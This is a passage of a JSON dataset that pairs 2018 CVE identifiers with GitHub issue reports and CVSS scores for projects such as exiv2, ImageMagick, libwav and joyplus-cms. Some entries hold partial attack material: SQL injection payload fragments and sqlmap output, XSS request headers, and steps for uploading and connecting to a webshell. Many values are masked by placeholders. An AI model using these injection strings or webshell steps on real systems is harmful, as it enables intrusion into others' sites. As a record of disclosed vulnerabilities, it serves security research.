        "Issue_Url_old": "https://github.com/twbs/bootstrap/issues/26628",
        "Issue_Url_new": "https://github.com/twbs/bootstrap/issues/26628",
        "Repo_new": "twbs/bootstrap",
        "Issue_Created_At": "2018-05-29T22:30:20Z",
        "description": "XSS possible in data container property of tooltip. XSS possible in tooltip data container attribute data container=\" APITAG \" Bootstrap NUMBERTAG in combination with APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14043",
        "Issue_Url_old": "https://github.com/Monetra/mstdlib/issues/2",
        "Issue_Url_new": "https://github.com/monetra/mstdlib/issues/2",
        "Repo_new": "monetra/mstdlib",
        "Issue_Created_At": "2018-07-12T14:08:40Z",
        "description": "APITAG File: PATHTAG L NUMBERTAG i.e APITAG I believe this indicates a security flaw, If an attacker can change anything along the path between the call APITAG and the files actually used, attacker may exploit the race condition. Request team to have a look and validate.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14046",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/378",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/378",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-07-09T01:52:51Z",
        "description": "APITAG heap buffer overflow PATHTAG APITAG long). exi NUMBERTAG pp $POC APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG f NUMBERTAG a NUMBERTAG fc0e bp NUMBERTAG fff NUMBERTAG cdcc NUMBERTAG sp NUMBERTAG fff NUMBERTAG cdcbf0 READ of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG f NUMBERTAG a NUMBERTAG fc0d in APITAG long) PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG cbe in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG std::char_traits APITAG , std::allocator APITAG > const&) PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG d NUMBERTAG in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG a9f NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG bbc7 in APITAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG bbc7 in APITAG long) PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG APITAG long) Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9d NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa fa fd fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING NUMBERTAG poc heapoverflow URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14047",
        "Issue_Url_old": "https://github.com/pngwriter/pngwriter/issues/129",
        "Issue_Url_new": "https://github.com/pngwriter/pngwriter/issues/129",
        "Repo_new": "pngwriter/pngwriter",
        "Issue_Created_At": "2018-07-11T11:49:30Z",
        "description": "SEGV in function pngwriter::readfromfile. I use Clang NUMBERTAG and APITAG to build pngwriter NUMBERTAG this file URLTAG can cause SEGV signal when running the test blackwhite in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14048",
        "Issue_Url_old": "https://github.com/glennrp/libpng/issues/238",
        "Issue_Url_new": "https://github.com/glennrp/libpng/issues/238",
        "Repo_new": "glennrp/libpng",
        "Issue_Created_At": "2018-07-12T04:16:47Z",
        "description": "SEGV in function png_free_data. Hi,all! We find a bug in libpng NUMBERTAG when using pngwriter URLTAG ,which take libpng as dependence. You can get more information by inferring this URLTAG !",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14049",
        "Issue_Url_old": "https://github.com/marc-q/libwav/issues/22",
        "Issue_Url_new": "https://github.com/marc-q/libwav/issues/22",
        "Repo_new": "marc-q/libwav",
        "Issue_Created_At": "2018-07-12T11:39:53Z",
        "description": "SEGV in function print_info in wav_info.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14050",
        "Issue_Url_old": "https://github.com/marc-q/libwav/issues/20",
        "Issue_Url_new": "https://github.com/marc-q/libwav/issues/20",
        "Repo_new": "marc-q/libwav",
        "Issue_Created_At": "2018-07-12T11:31:06Z",
        "description": "SEGV in function wrap_free in libwav.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause SEGV signal in function APITAG when running the APITAG in folder APITAG with the following command: APITAG This is the ASAN information: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14051",
        "Issue_Url_old": "https://github.com/marc-q/libwav/issues/21",
        "Issue_Url_new": "https://github.com/marc-q/libwav/issues/21",
        "Repo_new": "marc-q/libwav",
        "Issue_Created_At": "2018-07-12T11:33:52Z",
        "description": "Infinite loop in wav_read in libwav.c. I use Clang NUMBERTAG and APITAG to build libwav , this file URLTAG can cause infinite loop in function APITAG when running the APITAG in folder APITAG with the following command: APITAG Here is the gdb information: CODETAG The infinite loop is caused by this: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14063",
        "Issue_Url_old": "https://github.com/tracto2/Tracto-ERC20/issues/1",
        "Issue_Url_new": "https://github.com/tracto2/tracto-erc20/issues/1",
        "Repo_new": "tracto2/tracto-erc20",
        "Issue_Created_At": "2018-07-13T12:59:27Z",
        "description": "Integer overflow in APITAG I found an integer overflow in APITAG APITAG it doesn't use the safe function to add value. code addresss: URLTAG vuln code: ERRORTAG Before overflow FILETAG After add value APITAG FILETAG Discovered by zhihua. EMAILTAG .cn",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14065",
        "Issue_Url_old": "https://github.com/PHPOffice/PHPWord/issues/1421",
        "Issue_Url_new": "https://github.com/phpoffice/phpword/issues/1421",
        "Repo_new": "phpoffice/phpword",
        "Issue_Created_At": "2018-07-11T03:50:58Z",
        "description": "A vulnerability in APITAG Hi! I found a vulnerability in APITAG how can I report it to you?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14068",
        "Issue_Url_old": "https://github.com/martinzhou2015/SRCMS/issues/20",
        "Issue_Url_new": "https://github.com/martinzhou2015/srcms/issues/20",
        "Repo_new": "martinzhou2015/srcms",
        "Issue_Created_At": "2018-07-13T01:53:21Z",
        "description": "There is two CSRF vulnerability that can add the administrator account. After the administrator logged in, open the following two page poc\uff1a FILETAG CODETAG FILETAG CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14071",
        "Issue_Url_old": "https://github.com/cyberhobo/wordpress-geo-mashup/issues/817",
        "Issue_Url_new": "https://github.com/cyberhobo/wordpress-geo-mashup/issues/817",
        "Repo_new": "cyberhobo/wordpress-geo-mashup",
        "Issue_Created_At": "2018-07-12T03:19:31Z",
        "description": "Strengthen sanitization. Make sure all post editor and other user input is sanitized before use.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14072",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/67",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/67",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2018-07-14T01:39:16Z",
        "description": "Memory leak detected. Memory leaks detected when running program sixel2png the input file is APITAG with address sanitizer. ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14329",
        "Issue_Url_old": "https://github.com/samtools/htslib/issues/736",
        "Issue_Url_new": "https://github.com/samtools/htslib/issues/736",
        "Repo_new": "samtools/htslib",
        "Issue_Created_At": "2018-07-15T07:06:13Z",
        "description": "APITAG Team, File: PATHTAG CODETAG I believe this indicates a security flaw, If an attacker can change anything along the path between the call APITAG and the files actually used, attacker may exploit the race condition. Request team to have a look and validate.",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2018-14332",
        "Issue_Url_old": "https://github.com/clementine-player/Clementine/issues/6078",
        "Issue_Url_new": "https://github.com/clementine-player/clementine/issues/6078",
        "Repo_new": "clementine-player/clementine",
        "Issue_Created_At": "2018-06-06T22:18:50Z",
        "description": "Clementine often crashes when playing ogg files APITAG fault core dumped, qt5). System information Operating System: Arch Linux Clementine version: clementine qt5 git Expected behavior / actual behavior Clementine often crashes while playing ogg files. Sometimes as many times as once per song. (I would play an album, such as URLTAG , Clementine crashes, I start it back up and play so that the same song restarts, then it seems to crash on the next one.) I think this has been happening for a long time, I've part of using Clementine, but it seems more consistent now so maybe identifiable (I don't know if that's because I've been listening to a lot of ogg albums from FILETAG or a regression) Looking at the terminal output I thought it may have been the writing statistics to file bit or lastfm, but it still crashes without these. Here is some log URLTAG (from $ APITAG ), I don't know if it's relevant or the segfault occurs independently later. I will keep trying with different settings and types types of files and keep posting if I find anything.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-14334",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/428",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/428",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-07-16T04:06:53Z",
        "description": "Joyplus cms NUMBERTAG has any file upload vulnerability , leading to getshell. First, add a shortcut menu. FILETAG second, Switch to the home menu. FILETAG Third, you will find a file upload and upload a webshell. FILETAG last, use Cknife to connect the shell. FILETAG succes~ From the PATHTAG FILETAG As the picture show that, the developer have set white list restrictions, but he doesn't exit the file upload process. Fix: You should exit the script when detect the illegal files",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14337",
        "Issue_Url_old": "https://github.com/mruby/mruby/issues/4062",
        "Issue_Url_new": "https://github.com/mruby/mruby/issues/4062",
        "Repo_new": "mruby/mruby",
        "Issue_Created_At": "2018-06-25T15:27:56Z",
        "description": "Signed integer overflow in mrb_str_format. The check macro (in APITAG ) contains an signed integer overflow in bsize : ERRORTAG APITAG can become negative. However with APITAG the APITAG is never triggered, since bsiz is a signed integer. Signed integer overflows are undefined behaviour and thus gcc removes the check. This results in negative integers being passed to APITAG , which will set the string length without further checks. This can potentially result in a oversized string that allows to access arbitrary memory. In our experiments building with gcc in version APITAG produces the vulnerable binary while clang generated a safe executable. CODETAG Reproduce: CODETAG Backtrace in gdb : CODETAG Credits: This issue was reported by Sergej Schumilo, Daniel Teuchert and Cornelius Aschermann. Impact This results in negative integers being passed to APITAG , which will set the string length without further checks. This can potentially result in a oversized string that allows to access arbitrary memory.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14338",
        "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/382",
        "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/382",
        "Repo_new": "exiv2/exiv2",
        "Issue_Created_At": "2018-07-14T15:29:09Z",
        "description": "APITAG at APITAG File: geotag.cpp CODETAG and ERRORTAG According to the documentation of APITAG the output buffer needs to be at least of size APITAG specifying output buffers large enough to handle the maximum size possible result from path manipulation functions. In that instance, buf's size comes from APITAG . That function attempts to use APITAG as noted in the realpath NUMBERTAG docs. But over here APITAG nor APITAG is used. Passing an inadequately sized output buffer to a path manipulation function can result in a buffer overflow. Such functions include APITAG APITAG APITAG and others.",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-14371",
        "Issue_Url_old": "https://github.com/javaserverfaces/mojarra/issues/4364",
        "Issue_Url_new": "https://github.com/javaserverfaces/mojarra/issues/4364",
        "Repo_new": "javaserverfaces/mojarra",
        "Issue_Created_At": "2018-04-17T15:15:17Z",
        "description": "Where Can I Report Security Vulnerability?. I found a vulnerability in the latest version of Mojarra (vulnerable by default). But I can't find any security related mail from websites. Where can I report my finding?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14381",
        "Issue_Url_old": "https://github.com/pagekit/pagekit/issues/905",
        "Issue_Url_new": "https://github.com/pagekit/pagekit/issues/905",
        "Repo_new": "pagekit/pagekit",
        "Issue_Created_At": "2018-07-05T08:52:07Z",
        "description": "Open redirect vulnerability in /user/login?redirect=. Technical Details Pagekit version NUMBERTAG Web server: Apache Database: Mysql PHP Version NUMBERTAG Hello, I found a open redirect vulnerability. Detail: After a user login ,access this url URLTAG will redirect to google. Author: zhihua.yao from APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14387",
        "Issue_Url_old": "https://github.com/robiso/wondercms/issues/64",
        "Issue_Url_new": "https://github.com/wondercms/wondercms/issues/64",
        "Repo_new": "wondercms/wondercms",
        "Issue_Created_At": "2018-07-18T12:32:14Z",
        "description": "Session Fixation. Wonder CMS NUMBERTAG is prone to session fixation attack. APITAG Session Fixation attack fixes a session on the victim's browser, so the attack starts before the user logs in NUMBERTAG An attacker creates a new session on a web application and records the associated session identifier. The attacker then causes the victim to authenticate against the server using the same session identifier. APITAG attacker can access to the user's account through the active session APITAG authenticating a user, it doesn\u2019t assign a new session ID, making it possible to use an existent session ID. Let's see the session values before login FILETAG Session Values after Login: FILETAG Mitigation: The application should always first invalidate the existing session ID before authenticating a user, and if the authentication is successful, provide another APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14388",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/429",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/429",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-07-16T10:19:16Z",
        "description": "joyplus cms NUMBERTAG FILETAG has new Cross Site Scripting: requests:. requests: POST PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG APITAG APITAG APITAG &t_sort NUMBERTAG t_des=test FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-14389",
        "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/430",
        "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/430",
        "Repo_new": "joyplus/joyplus-cms",
        "Issue_Created_At": "2018-07-16T11:01:41Z",
        "description": "joyplus cms NUMBERTAG FILETAG has SQL Injection. requests:GET PATHTAG HTTP NUMBERTAG Host: localhost User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: application/json, text/javascript, / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded X Requested With: APITAG Cookie: APITAG adminid NUMBERTAG adminname=admin; APITAG APITAG DNT NUMBERTAG Connection: close sqlmap: FILETAG sqlmap identified the following injection point(s) with a total of NUMBERTAG HTTP(s) requests: Parameter: val (GET) Type: boolean based blind Title: APITAG NUMBERTAG boolean based blind Parameter replace Payload: APITAG (CASE WHEN NUMBERTAG THEN NUMBERTAG ELSE NUMBERTAG SELECT NUMBERTAG FROM APITAG END)) Type: UNION query Title: Generic UNION query (NULL NUMBERTAG columns Payload: APITAG UNION ALL SELECT APITAG APITAG web server operating system: Windows web application technology: Apache NUMBERTAG PHP NUMBERTAG back end DBMS: APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14401",
        "Issue_Url_old": "https://github.com/jjanier/axml/issues/1",
        "Issue_Url_new": "https://github.com/jjanier/axml/issues/1",
        "Repo_new": "jjanier/axml",
        "Issue_Created_At": "2018-07-17T12:11:29Z",
        "description": "out of bound read lead the program crash.. When load the poc file with gdb . I got that It call APITAG function to copy file data to memory buf. But the APITAG is out of memory , it could lead crash ERRORTAG The poc and the binary APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14402",
        "Issue_Url_old": "https://github.com/ytsutano/axmldec/issues/4",
        "Issue_Url_new": "https://github.com/ytsutano/axmldec/issues/4",
        "Repo_new": "ytsutano/axmldec",
        "Issue_Created_At": "2018-07-17T12:38:51Z",
        "description": "access invail memory lead to crash. When load the poc file with gdb . I got that It call APITAG function . and it access memroy using rax 's value APITAG but APITAG , this could lead crash ERRORTAG The binary and poc APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14415",
        "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/28",
        "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/28",
        "Repo_new": "idreamsoft/iCMS",
        "Issue_Created_At": "2018-07-17T10:48:17Z",
        "description": "Cross Site Scripting. First Enter the page APITAG and the payload is: FILETAG Then,we can see the result. FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14422",
        "Issue_Url_old": "https://github.com/thm/SansCMS/issues/7",
        "Issue_Url_new": "https://github.com/thm/sanscms/issues/7",
        "Repo_new": "thm/SansCMS",
        "Issue_Created_At": "2017-09-06T14:43:58Z",
        "description": "XSS in PATHTAG Here is a xss in PATHTAG about parameter q. POC: APITAG This poc will pop a window in APITAG browser.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14435",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1193",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1193",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-04T05:52:15Z",
        "description": "coders/pcd.c APITAG potential memory leak bug. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description a potential memory leak bug locates in coders/pcd.c Steps to Reproduce the bug locates in FILETAG : APITAG function. the code frament is as follows: we allocate buffer memory, we freed it in normal branch\uff0cbut forgot free it in exception branch URLTAG ERRORTAG but we forget free it in URLTAG ERRORTAG credit: APITAG ( \u58a8\u4e91\u79d1\u6280) System Configuration APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14436",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1191",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1191",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-04T03:04:58Z",
        "description": "coders/miff.c colormap potential memory leak bug. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description a potential memory leak bug locates in coders/miff.c Steps to Reproduce the bug locates in URLTAG the code frament is as follows: the code locates in a if block,and we allocate colormap memory in the if block, we freed it in normal branch\uff0cbut forgot free it in exception branch ERRORTAG credit: APITAG System Configuration APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14437",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1190",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1190",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-07-03T11:39:50Z",
        "description": "memory leak bug in meta.c: APITAG function. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description hello,i find a memory leak bug in imagemagick,the details is on the Steps to Reproduce. Steps to Reproduce the bug located in meta.c ,static ssize_t APITAG ifile, Image ofile) function the bug code is on URLTAG the code fragment is as follows\uff1a CODETAG we can see that we allocate a memory and assigned it to line,but we forget to free it in the code: URLTAG the code is as follows: ERRORTAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-14439",
        "Issue_Url_old": "https://github.com/espritblock/eos4j/issues/6",
        "Issue_Url_new": "https://github.com/espritblock/eos4j/issues/6",
        "Repo_new": "espritblock/eos4j",
        "Issue_Created_At": "2018-07-19T10:58:10Z",
        "description": "\u8f6c\u8d26\u7cbe\u5ea6\u95ee\u9898. \u8f6c\u8d26\u65b9\u6cd5\u7684 asset \u5e8f\u5217\u5316\u65f6\uff0c\u628a amount NUMBERTAG APITAG EOS NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14440",
        "Issue_Url_old": "https://github.com/cckevincyh/CompanyWebsite/issues/3",
        "Issue_Url_new": "https://github.com/cckevincyh/companywebsite/issues/3",
        "Repo_new": "cckevincyh/companywebsite",
        "Issue_Created_At": "2018-07-19T09:30:15Z",
        "description": "\u8fd9\u6709\u4e2aSQL\u6ce8\u5165. POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Referer: URLTAG Cookie: APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG and NUMBERTAG and '%'='",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-14441",
        "Issue_Url_old": "https://github.com/cckevincyh/CompanyWebsite/issues/4",
        "Issue_Url_new": "https://github.com/cckevincyh/companywebsite/issues/4",
        "Repo_new": "cckevincyh/companywebsite",
